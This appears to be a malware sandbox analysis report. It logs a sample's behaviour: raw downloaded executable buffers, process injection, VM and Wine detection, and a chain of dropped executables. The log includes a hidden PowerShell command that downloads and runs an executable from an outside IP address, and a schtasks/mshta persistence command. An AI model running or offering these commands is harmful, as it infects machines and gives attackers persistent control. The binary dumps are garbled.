L$,t$@é6üÿÿè^zò\$ÇD$èHD$4$D$D$è4©Û$ÇD$èèzL$,t$@éßûÿÿèAèAéèû@ÍL ÍFÓ9Ø}.5ÔÙ=ÐÙ9ðs0ÆÁàÆD=ÔÙÚÐÙ9þrÃë t$@éûÿÿðùèª@ñè£@Áøèú@¸Ñèî@ÑÂè¥@ÁÐè\|@ðéèÓ@Áêè@éèc@èÍ+éûÿÿÌÌÌÌÌÌÌÌd ;aìXà¾$èY¬D$Ç@ Ðà ¡ ÜHÇ@ ÓàH ÜHÇ@$ èH ¦ ÜH(Ç@4 {4H0 © ÜH8Ç@D ßH@ « ÜHHÇ@T çáHP ¬ ÜHXÇÔÙÇØÙ ðÜÉuÐÙë=ÐÙèß>è $øO ÔÙÁÐÙØÙ9Ës[D$($L$\$ÇD$ÙD$è¿¢D$L$T$ØÙðÜÒuÐÙë=ÐÙè`>ÂD$( ÔÙÁûÁáÇD fÇD ðÜ< l t t$Tt t$Pt t$Lt (t$Ht 0t$Dt 8t$@t @t$<t HÛuC ª Ü\ ëÃCèÐ=ïª ÜèÃ=ØÇD fÇD ðÜÛuÒê\ Ü\ ë"\|$TÃÒêè=\|$P Üèr=ØÇD $fÇD ,ðÜÛuù\ ¯ Ü\ (ë"\|$LÃùè0=\|$H¯ Üè!=ØÇD 4fÇD <ðÜÛuù\ 0° Ü\ 8ë"\|$DÃùèß<\|$@° ÜèÐ<ØÇD DfÇD LðÜÛuù\ @® Ü\ Hë \|$<Áùè<÷® Üè<Èø3 ÔÙÁÐÙØÙ9ËsS$L$\$ÇD$ÙD$èk D$L$T$ØÙðÜÒuÐÙë=ÐÙè<Â ÔÙÁûÁáÇD fÇD ðÜ< l t ðt t$8t t$Tt (t$4t 0t$Lt 8t$0t @t$Dt HÛuëà ¢ Ü\ ëÃëàè;ï¢ Üèu;ØÇD fÇD ðÜÛu&ç\ £ Ü\ ëÇ&çè7;\|$8£ Üè(;ÇD $fÇD ,ðÜÛuBç\ ¤ Ü\ (ë\|$TBçèê:\|$4¤ ÜèÛ:ÇD 4fÇD <ðÜÛuFç\ 0¥ Ü\ 8ë\|$LFçè:\|$0¥ Üè:ÇD DfÇD LðÜÛu$áD @§ ÜD Hë\|$D$áèP:÷§ ÜèC:Ç$ÇD$èD$øD$$Ç$ÇD$èúD$hÜÇ$ÇD$è request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%gàfª@¹@À@Ù9´.textdf `.rdatas "j@@.dataôÏ°N@À.reloc9:Ú@BD$Àt(8ïux»u x¿uÀD$D$jPèÄÃ1ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌUSWVìt$,1Ûþ\|$(/¶]Sè·¤ÄÀt%E/¶]Sè¤ÄEÀuìM¶ÃÀÞøYÌ1Ûÿ$,DèN§ÇD$Pÿ7è\|¤ÄÝ\$è0§1Û8"ÝD$ÙáuÙ(DÙÉÚéßàÙîrÝØéúÝØè§8tèú¦8"àt$/ó)ëûr+}0u}.uFûtjhÊDUèD£ÄÀu}.u't$Þîrn¾DÿjPh¦DèÉ¢ÄóÀtà1ÛéxjUhvDèü¢ÄÀ)jUh{Dèä¢ÄÀHÅ/jÿ°DÄ1ÉÀëD$ìÝD$Ý$è8¦Äfø»jÿ°DÄÀòÇÇ@ÝD$ÝXéjUhqDè]¢ÄÀÁÅ/jÿ°DÄÀ©ÇÇ@ëNFùòÄ^_[]é Ç$âùèJ1ÛÀtsÇ4$jÿ°DÄÀtUÇÇ@xpÃëHFùòÄ^_[]é(Å/jÿ°DÄÀt#¹ÃÇÇ@Hë Wÿ°DÄØÄ^_[]ÃÌÌÌÌÌÌÌUSWVP\$1öÛtRl$ítJUèC¡ÄÇPUè·ÄÇ$áQPWUSèñÄ<$tKSÀt xupðÄ^_[]ÃÌÌÌÌÌL$1ÀÉt yuAÃÌÌÌÌÌÌÌÌÌÌÌÌSWVP\|$Ùîÿt\\$ÛtTÝØSè² ÄÆPSè&ÄÇ$áQPVSWè`Ä<$tOWÀÙîtxu ÝØÝ@ëÙîÄ^_[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌL$1ÀÉt yuAÃÌÌÌÌÌÌÌÌÌÌÌÌUSWVP\$1öÛtRl$ítJUè ÄÇPUèÄÇ$áQPWUSèÁÄ<$tKSÀt xupðÄ^_[]ÃÌÌÌÌÌL$1ÀÉt yuAÃÌÌÌÌÌÌÌÌÌÌÌÌUSWVP\$¾ÿÿÿÿÛtRl$ítJUèÄÇPUèôÄÇ$áQPWUSè.Ä<$tKSÀt xupðÄ^_[]ÃÌÌUSWVì\$ \|$j.SèÄÀt{Åë$1ÿëCj.SècÄÅÀtSÿtæÛtâî)ÞVSèWÄÇD$L$QPVSWèÄ\|$t´OW1ÿÀt¤xuxë1ÀÿtEÛtASèÄÆPSèûÄÇ$áQPVSWè5Ä<$tOWë1ÀÄ^_[]ÃÌÌÌÌÿt$ÿt$èÿÿÿÄÁ1ÀÉt yuAÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿt$ÿt$èÓþÿÿÄÁ1ÀÉt yuAÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌD$Àt@Ã1ÀÃÌL$1ÀÉtT$9QvAÃÌÌÌÌÌÌUSWVP\|$1ÛÿtUl$ítMUèÄÆPUèÄÇ$áQPVUWèAÄ<$tOWÀtL$ 1Û9HÃØÄ^_[]ÃÌÌL$1ÀÉtT$9QvAÃÌÌÌÌÌÌD$Àt@Ã1ÀÃÌL$1ÀÉtT$9QvIÉt yuAÃÌÌÌÌÌÌÌÌÌWVD$ÀteHùtQùtùuSpjjVè Äë2p~t1ÿFÿ4¸èµÿÿÿÄG;~rìÿvÿ°DÄVëÿpÿ°DÄ^_ÿ%°DÌÌÌÌÌÌÌÌÌUSWVP¾ÿÿÿÿ\|$µl$í©\|$ Uè.ÄÃPUè¢ÄÇÇ$àPWSëUl$(UèÔÄ<$ueM;Mr(UèmÄÀuPSèàÄáQWPSUè¡ÄMUMUMt$ 4MUEM<ÿEE1öðÄ^_[]ÃÌÌÌÌÌÌÌÌÌÌÌÌSWVL$Ét/T$¿1ö¶2ÛtøÁàøØFÇ9ñuèë ¸ëø^_[ÃÌÌÌÌÌÌÌÌÌUSWVìD$,T$j Çz ÿ\|M#l$(GÿD$B$ë EOt[t$!î$°øÿtOJ\$(9ußJSèÃT$ Ä;D$$uÆÿt$$Sÿt$(èÈT$(ÄÀuD$,Çë¾ÿÿÿÿðÄ^_[]ÃÌÌUSWVì,D$@h íýs½ÇD$ l$(í)è¹ÍÌÌÌ÷á×Áï\|$$Pÿ°DÄÆD$ÁçWÿ°DÄD$D$Wÿ°DÄÃD$Wÿ°DÄ$D$W\|$ÿ°DÄD$öt@ÿt<Ût8<$t2Àt.1ÀÇÿÿÿÿÁáðH9èrê\|$@ÿtG7ëEVÆÿ°DÄWÿ°DÄSÿ°DÄÿ4$ÿ°DÄVÿ°DÄ¸ÿÿÿÿÄ,^_[]Ã1öt$t61ÛGO,Uÿ4D$PèÉüÿÿÄÀu%uC;_rÙjjWè_ Ät$¹ ó¥1ÀëjjD$Pè? ÄëÌÌÌÌÌÌÌÌÌÌUSWVìÖÏjÿ°DÄ1ÛÀ"ÅÇÇ@j$ÿ°DÄÀ¹t$(Ç@Ç@Ç@Ç@Ç@Ç@Ç@Ç@ request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $A{Ñk¿8¿8¿8b<8¿8b,8¿8¾8©¿88 ¿8%8¿8"8¿8Rich¿8PELb\|Nà t~B¯8@âý @@¬´jíâ x)` Ð.textrt `.rdatan+,x@@.data+À¤@À.ndataðÀ.rsrcjíî¦@@.relocÖð¼@BUìì\}t+}FEu H ´êGHPÿuÿuÿuÿ@éKSV5¼êGWE¤Pÿuÿ@eôEEäPÿuÿ@}ðeðD@é¶FR¶VV¯UèÏ+Mè¯ÁÂ÷ÿM¶ÀÁàE¶FQ¯Á¶NU¯MèÁ÷ÿM¶VT¯Uè¶ÀÈ¶FP¯EÂ÷ÿÁá¶ÀÈEôPMøÿH@EðPEEäPÿuÿ@ÿuÿÓEè9}ènÿÿÿ~Xÿteÿv4ÿL@EÀtU}jWÇEäÇEèÿP@ÿvXWÿT@ÿu5X@WÿÖh EEäPjÿh jGWÿ@ÿuWÿÖÿuÿÓE¤Pÿuÿ @_^3À[ÉÂL$¡ÈêGÑiÒ @TöÂtUVWq3ÿ;5ÌêGsDÎiÉ @DSöÁtGëöÁt ÏOÉt ëöÁuÙ3Úã3ÙF @;5ÌêGrÊ[_^ÂUìQQUSÈêGVòiö @óF3ÉWMüMø¨t9Mtà¾FB;ÌêGsDÂiÀ @\|BöÁt jRè¤ÿÿÿöÁu(öÁ@tÿEüöÁtÿEüëÿEøÐ;ÌêGr¼3À_^[ÉÂ}ütó}øtN@ëçNáÿÿÿÉNëÖL$¡ÈêGV3öù s695ÌêGv.PW¨u3ÿGÓçzütÈëàþFÂ @;5ÌêGr×_^ÂUìì¡¼êGeüSVW=ÌêGEøEø3Û9tM;ßsG5ÈêGÆöÂu*EÀt<tMü3À@ÓàNüâ#ÈMôMüÓâ9UôuCÆ @;ßrÄ;ßt ÿEüEø}ü rEü_^[ÉÂD$Ày@iÀ@¹ðG+ÈQèüKÂVt$ëhÆkÀÐêG8t\Pèæ=ÿÿÿtUPè·ÿÿÿÀu@FëHÎð+Á\|$t/jGjÿ5jGh0uÿ5jGÿP@Phÿt$ÿ@öy3À^Â¸ÿÿÿëõD$ ¼êGjÿtlèkÿÿÿÂhðAÿt$è[;Â¡äÀ@ÿ4jèÜSPè;KÃD$3Â+ÂäÀ@ÈÁøiÀ@Váÿ4èÀ@Pè©S\|$ð}VèÍKÆ^ÂUììSVWEüP¡ëGÈP3ÛSÿuÿuÿ@;Ãui5@¿ë9]uKSðýÿÿPÿuüè²ÿÿÿÀuWðýÿÿPSÿuüÿÖÀtÕÿuüÿ@jèN;Ãt$Sÿ5ëGÿuÿuÿÐëÿuüÿ@3À@_^[ÉÂ9ëGuîÿuÿuÿ@ÀuÞëßUì¡äÀ@@VÀtðë5dëGÆEP¡ëGEPjj"èÓþÿÿPVÿ@÷ØÀ÷Ð#E^]ÂÌUìì¬¡´êGSVuWjY}Ðó¥UÔMØòùiö@iÿ@Eô¸ðGðøEÔ£äÀ@EÐ3ÛÀþ]üøGéÿ$ø0@Rh´@èÃLEÔYYéØSè@þÿÿPh@è¨LYYSÿuÔèl9¸ÿÿÿé²ÿtjG9]ôtëSÿ<@ëâRè(ýÿÿpÿVh@èkLYYSVè0ýÿÿé\|SèäýÿÿPh`@èLLYYSÿuÔè9éP3Éè¬ýÿÿðVhL@è(LYYþ3öFVÿ@é&h0@èLYÿuôÿ@@é Â9]Üu%`ëG ëG3ÉAèSýÿÿMÔ`ëGéá ëG`ëGéÎuÜ4µ`ëG3À;ËÀ#MàDÔé¸ÿ4`ëGé¡jG5D@;ÃtQPÿÖUÔ¡ljG;Ã~RPÿÖéujðèçüÿÿÿuØðVhô@èJKÄÿuØVÿ@ÀIÇEühÀ@è$KYé2jðè¤üÿÿÿuØEPh@èKÄÿuè±Eð;ój\VèLEð·>Sÿu3Àfÿ@ÀuHÿ@=·tÿ@Pÿuh0@è°JÄÿEüë.ÿuÿ\|@¨u!ÿuh¸@èJÿEüë ÿuhx@è\|JYYf>Æf;ûzÿÿÿhðA9]Øt"jæè)7ÿuh°pMè³Gÿuÿx@éSjõéòýÿÿSè¿ûÿÿðVè\JÀtÿuØVh @èJÄEØé,ÿuÜVh¸@èÿIÄEÜéjÐèzûÿÿjßðèqûÿÿjEègûÿÿøWh@èÍIYYÿuVÿt@ÀthðAjãékýÿÿ9]Üt'VèØIÀtÿuVè^ShðAjäè\6Whp@ë WhL@ÇEüèsIYéIþÿÿSèôúÿÿðEPWh Vÿp@Àt$E;Æv)f9t$VèpI;ÃtÀ,PÿuèFë3ÀfÇEü9]Ü+h WWÿl@éjÿèúÿÿMQVh SPSÿh@À÷3ÀÇEüféæjïèXúÿÿPVè DÀÐÇEüéÄj1è6úÿÿðEÔÈÁøVàáPQhØ@uÌMèHÄVèÿBV¾èÀ@ÀtVèÓEëh°pMVèÆEPèÙLPèÖEVèãE¿ø@A}\|1VèoH3É;ÃtMàQÀPÿd@ÈEÀý #Á÷ØÀ@E9]uVèC3À}À@Ph@VèCEøøÿ¿9]uwVh @èÕGYYhðGWè.EVhðGè#EÿuèhðAèMWhðGèEEÔÁøPhðAèAèuhp@èGYé6ÿÿÿHt@h@@èrGYVjúéÇúÿÿÿuÌjâè.4}uÇEüÿuVhð@èDGÄéPh¼@è2GÿhëGYéCÿuÌjêèë3ÿëGSSÿuøÿuÜè¹ÿ ëGøVWh@èõFÄ}àÿu}äÿtEàPSPÿuøÿ`@ÿuøÿ¼@ request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELvtßà.0I `@ à`ÀHK`xH H.text) `.rsrc`0@@.reloc6@B.rdata 8@À.rdataÀL@ÀðHHµÐl5«0ã þ8þE%8~: 8Òÿÿÿrps z~¿(ý é s ~À(þ8þ ~Á(~Â( ?¬ÿÿÿ ~¡{¨:_ÿÿÿ& 8Tÿÿÿ ~¡{¦::ÿÿÿ& 8/ÿÿÿ(&~þ~F~Ã( 8.~Ä(8~Ä(~Å(8åÿÿÿ0c þ8þE8~Æ(&8ïÿÿÿrêp~Ã( ~¡{w:ºÿÿÿ& 8¯ÿÿÿ.~Ç(0 þ8þE/08~È(! ~¡{·:Ëÿÿÿ& 8Àÿÿÿ~Ã( 8~É(% ~¡{¼9ÿÿÿ& 8ÿÿÿ0G(8( ~¡{½9& 8 8ÌÿÿÿþE8&~þ~(Í0ó þ8þE«Ac8¦~~i~~i( ~¡{f:µÿÿÿ& 8ªÿÿÿ~~i~~i(8# ~¡{^:qÿÿÿ& 8fÿÿÿ~~i@( 8@ÿÿÿ~ ~(8¹ÿÿÿ0G(8( ~¡{`9& 8 8ÌÿÿÿþE80]8þE8(8 %Ð ~Ê() ~¡{9·ÿÿÿ& 8¬ÿÿÿ^þ þ þ þ (&~þ~(Í0 þ8þEó½T,8î8rp~Î(9~Ï(= ~¡{]:ÿÿÿ& 8ÿÿÿ ~¡{¬9pÿÿÿ& 8eÿÿÿi< 8PÿÿÿX8àÿÿÿ8gÿÿÿ ~¡{9)ÿÿÿ& 8ÿÿÿ~Ë(-~Ì(1 ~¡{:óþÿÿ& 8èþÿÿs ~Í(5~ ~¡{:ºþÿÿ& 8¯þÿÿ8Eÿÿÿ ~¡{x:þÿÿ& 8þÿÿ08þE2· ¬e[AÀ·M( éüÒÁñ_¦D¨"Ýßµ'I¡´tÒ~2ÛHuÆ8². 8!ÿÿÿ-X~Ë(-/~Ñ(E~Ò(I~Ó(M]-8Ë51o 8Øþÿÿs 4 ~¡{P9½þÿÿ& 8²þÿÿ-X- 8¢þÿÿnj>Ø "8þÿÿrp/ 8\|þÿÿ8#8QÿÿÿY 8aþÿÿ- 8Tþÿÿ1?+ÿÿÿ 8Bþÿÿ. þ8-þÿÿ8^ '8"þÿÿ+-2o 08þÿÿsr,p5( 77~Ô(Q~Ï(=(! ~¡{[:Éýÿÿ& 8¾ýÿÿ1X1 8®ýÿÿ+--~Ð(A 8ýÿÿ*2+.o 8\|ýÿÿ8 8mýÿÿ+-+.X~Ë(-/~Ñ(E~Ò(I~Ó(M]3 ~¡{:!ýÿÿ& 8ýÿÿ8cÿÿÿ ~¡{i9ýüÿÿ& 8òüÿÿ8Ñ 1~¡{U:Ùüÿÿ& 8Îüÿÿ! >8 request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYØYØYØ3ÚpØYÙ[ØëÈ[ØYØVØáÞXØRichYØPEL»dà Þ¶0J@`JGT!@[ðoàH ÐJ@à.rsrcHàZ@À.idata ð^@À 0)`@àjbypnjilð00âb@àrdkwtnsn JD @à.taggant00J"H @à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%gàf¬pJ@ JÚ×@Wk¬ø pp@à.rsrc¬@À.idata @À À* @àrufmbtlx`0ú@àkrhndclf`J@à.taggant0pJ"@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 11, 2025, 10:40 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL gà~d°E@àEÚ`EWUiø ðØ@à.rsrcè@À.idata ì@À ) î@àgfrqabhkàÀ+Öð@àclsldkbz EÆ@à.taggant0°E"Ê@à request_handle: 0x00cc000c	1	1

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2592 called NtSetContextThread to modify thread in remote process 2760
Process injection	Process 2084 called NtSetContextThread to modify thread in remote process 2696
NtSetContextThread Feb. 11, 2025, 10:40 a.m.	registers.eip: 1995571652 registers.esp: 1636628 registers.edi: 0 registers.eax: 4242016 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000208 process_identifier: 2760	1	0	0
NtSetContextThread Feb. 11, 2025, 10:40 a.m.	registers.eip: 1995571652 registers.esp: 2030304 registers.edi: 0 registers.eax: 4241728 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000208 process_identifier: 2696	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2592 resumed a thread in remote process 2760
Process injection	Process 2188 resumed a thread in remote process 1728
Process injection	Process 2084 resumed a thread in remote process 2696
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2760	1	0	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1728	1	0	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2696	1	0	0

Creates a suspicious Powershell process (4 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 11, 2025, 10:40 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 0c 24 54 59 83 ec exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f6247 exception.instruction: in eax, dx exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE exception.exception_code: 0xc0000096 exception.offset: 2056775 exception.address: 0xab6247 registers.esp: 2685904 registers.edi: 4141225 registers.eax: 1447909480 registers.ebp: 3999641620 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 11215821 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress Feb. 11, 2025, 10:40 a.m.	ordinal: 0 function_address: 0x0018fe29 function_name: wine_get_version module: ntdll module_address: 0x76f10000		3221225785	0

Executed a process and injected code into it, probably while unpacking (50 out of 89 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 2628 thread_handle: 0x00000154 process_identifier: 2624 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000158	1	1
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 2672 thread_handle: 0x00000158 process_identifier: 2668 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000154	1	1
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 2732 thread_handle: 0x00000084 process_identifier: 2728 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 2668	1	0
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 2668	1	0
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 2832 thread_handle: 0x00000338 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000344	1	1
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2828	1	0
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2828	1	0
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2828	1	0
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x0000056c suspend_count: 1 process_identifier: 2828	1	0
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x00000598 suspend_count: 1 process_identifier: 2828	1	0
CreateProcessInternalW Feb. 11, 2025, 10:39 a.m.	thread_identifier: 3028 thread_handle: 0x00000660 process_identifier: 3024 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE track: 1 command_line: "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE" filepath_r: C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000668	1	1
NtResumeThread Feb. 11, 2025, 10:39 a.m.	thread_handle: 0x0000067c suspend_count: 1 process_identifier: 2828	1	0
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 3024	1	0
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2200 thread_handle: 0x000003d8 process_identifier: 2192 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e0	1	1
NtResumeThread Feb. 11, 2025, 10:40 a.m.	thread_handle: 0x000001a0 suspend_count: 1 process_identifier: 2192	1	0
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2596 thread_handle: 0x00000474 process_identifier: 2592 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000478	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2724 thread_handle: 0x0000044c process_identifier: 2792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000484	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2928 thread_handle: 0x00000384 process_identifier: 3004 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000480	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2980 thread_handle: 0x00000468 process_identifier: 3064 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2088 thread_handle: 0x0000047c process_identifier: 2084 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000048c	1	1
CreateProcessInternalW Feb. 11, 2025, 10:40 a.m.	thread_identifier: 2620 thread_handle: 0x000003ac process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000494	1	1
